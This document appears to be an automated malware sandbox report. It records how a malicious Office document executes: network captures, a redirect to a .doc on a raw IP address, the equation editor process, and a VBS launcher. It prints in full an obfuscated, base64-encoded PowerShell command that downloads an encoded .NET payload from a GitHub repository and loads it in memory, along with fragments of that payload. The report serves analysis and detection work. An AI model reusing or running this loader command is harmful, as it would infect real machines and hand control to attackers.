                                                                                                      2024-09-27 10:51:42 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 74 72 6d 72 2e 63 6f 0d 0a 0d 0a
                                                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: strmr.co
                                                                                                      2024-09-27 10:51:42 UTC829INHTTP/1.1 404 Not Found
                                                                                                      Date: Fri, 27 Sep 2024 10:51:42 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      content-security-policy: default-src 'none'
                                                                                                      strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                      vary: Accept-Encoding
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-dns-prefetch-control: off
                                                                                                      x-download-options: noopen
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-xss-protection: 1; mode=block
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1uOQy5OWhwgAEDA6b%2B9DSXraCaEiJEQSggwDrBIvFBooBZvd8XlHkEQVagDaYxLSdTVeyiJOF8F3AaQS%2F5Fbu7XhkizjwyA6ucFyjZ3NohOo5rKM%2FIMPrMeqdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8c9af0a5d895c332-EWR
                                                                                                      2024-09-27 10:51:42 UTC150INData Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                      Data Ascii: 90<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
                                                                                                      2024-09-27 10:51:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.2249170104.21.64.884433528C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-27 10:51:43 UTC134OUTHEAD /a9ifFT HTTP/1.1
                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                      Host: strmr.co
                                                                                                      Content-Length: 0
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-09-27 10:51:43 UTC986INHTTP/1.1 302 Found
                                                                                                      Date: Fri, 27 Sep 2024 10:51:43 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Content-Length: 210
                                                                                                      Connection: close
                                                                                                      location: http://104.168.32.148/550/ed/enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson.doc
                                                                                                      strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                      vary: Accept-Encoding
                                                                                                      vary: Accept
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-dns-prefetch-control: off
                                                                                                      x-download-options: noopen
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-xss-protection: 1; mode=block
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wB9W%2FN1UrahuAX48dSfaHu1EiCegDJMxyTxqD0iHXesRBLZ4wY2SJOpACMjFhcfhO7Duzbfwh9KzfJzYwZ7z2uE2kcBAps1D9zLoMbweb2f6Iap2GT%2BisnxtpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8c9af0abce900f47-EWR


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.2249173185.199.108.1334434036C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-27 10:51:50 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                      Host: raw.githubusercontent.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-09-27 10:51:50 UTC901INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      Content-Length: 2935468
                                                                                                      Cache-Control: max-age=300
                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: deny
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      X-GitHub-Request-Id: AE01:1E9E33:466016:4C7790:66F68932
                                                                                                      Accept-Ranges: bytes
                                                                                                      Date: Fri, 27 Sep 2024 10:51:50 GMT
                                                                                                      Via: 1.1 varnish
                                                                                                      X-Served-By: cache-ewr-kewr1740020-EWR
                                                                                                      X-Cache: HIT
                                                                                                      X-Cache-Hits: 0
                                                                                                      X-Timer: S1727434311.787543,VS0,VE8
                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                      X-Fastly-Request-ID: d0e496cf2add6ae32289eaf30681387a6f71b364
                                                                                                      Expires: Fri, 27 Sep 2024 10:56:50 GMT
                                                                                                      Source-Age: 0
                                                                                                      2024-09-27 10:51:50 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                      Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                      2024-09-27 10:51:50 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                      Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                      2024-09-27 10:51:50 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                      Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                      2024-09-27 10:51:50 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                      Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                                                      2024-09-27 10:51:50 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                      Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                      2024-09-27 10:51:50 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                      Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                      2024-09-27 10:51:50 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                      Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                      2024-09-27 10:51:50 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                      Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                      2024-09-27 10:51:50 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                      Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                      2024-09-27 10:51:50 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                      Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:06:51:01
                                                                                                      Start date:27/09/2024
                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                      Imagebase:0x13f050000
                                                                                                      File size:28'253'536 bytes
                                                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:5
                                                                                                      Start time:06:51:32
                                                                                                      Start date:27/09/2024
                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                                                                      Imagebase:0x13fb80000
                                                                                                      File size:1'423'704 bytes
                                                                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:10
                                                                                                      Start time:06:51:43
                                                                                                      Start date:27/09/2024
                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                      Imagebase:0x400000
                                                                                                      File size:543'304 bytes
                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:11
                                                                                                      Start time:06:51:45
                                                                                                      Start date:27/09/2024
                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS"
                                                                                                      Imagebase:0x350000
                                                                                                      File size:141'824 bytes
                                                                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:12
                                                                                                      Start time:06:51:45
                                                                                                      Start date:27/09/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                      Imagebase:0xc20000
                                                                                                      File size:427'008 bytes
                                                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:14
                                                                                                      Start time:06:51:46
                                                                                                      Start date:27/09/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
